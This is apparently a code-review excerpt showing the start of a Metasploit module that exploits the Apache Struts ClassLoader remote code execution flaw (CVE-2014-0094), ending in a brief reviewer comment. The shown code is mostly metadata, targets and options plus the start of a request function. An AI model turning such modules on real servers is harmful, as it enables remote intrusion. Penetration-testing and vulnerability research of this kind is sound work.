modules/exploits/multi/http/struts_code_exec_classloader.rb

```diff
@@ -0,0 +1,198 @@
+##
+# This module requires Metasploit: http//metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Apache Struts ClassLoader Manipulation Remote Code Execution',
+      'Description'    => %q{
+        This module exploits a remote command execution vulnerability in Apache Struts
+        versions < 2.3.16.2. This issue is caused because the ParametersInterceptor allows
+        access to 'class' parameter which is directly mapped to getClass() method and
+        allows ClassLoader manipulation, which allows remote attackers to execute arbitrary
+        Java code via crafted parameters.
+      },
+      'Author'         =>
+        [
+          'Mark Thomas', # Vulnerability Discovery
+          'Przemyslaw Celej', # Vulnerability Discovery
+          'pwntester <alvaro[at]pwntester.com>', # PoC
+          'Redsadic <julian.vilas[at]gmail.com>' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2014-0094'],
+          [ 'CVE', '2014-0112'],
+          [ 'URL', 'http://www.pwntester.com/blog/2014/04/24/struts2-0day-in-the-wild/'],
+          [ 'URL', 'http://struts.apache.org/release/2.3.x/docs/s2-020.html']
+        ],
+      'Platform'      => %w{ linux win },
+      'Privileged'     => true,
+      'Targets'        =>
+        [
+          ['Windows Universal',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'win'
+            }
+          ],
+          ['Linux Universal',
+            {
+              'Arch' => ARCH_X86,
+              'Platform' => 'linux'
+            }
+          ],
+          ['Java Universal',
+            {
+              'Arch' => ARCH_JAVA,
+              'Platform' => ['win','linux']
+            },
+          ]
+        ],
+      'DisclosureDate' => 'Mar 06 2014',
+      'DefaultTarget' => 2))
+
+      register_options(
+        [
+          Opt::RPORT(8080),
+          OptString.new('TARGETURI', [ true, 'The path to a struts application action', "/hello_world/hello.action"])
+    ], self.class)
+  end
+
+
+  def exec_cmd(uri, cmd = "")
+    resp = send_request_cgi({
+            'uri'     => uri+cmd,
```

Comment:
@hatRiot seems that SMB server lib that @0x41414141 did for this and another exploits is giving him more work than expected (https://github.com/rapid7/metasploit-framework/pull/3323#issuecomment-69244933).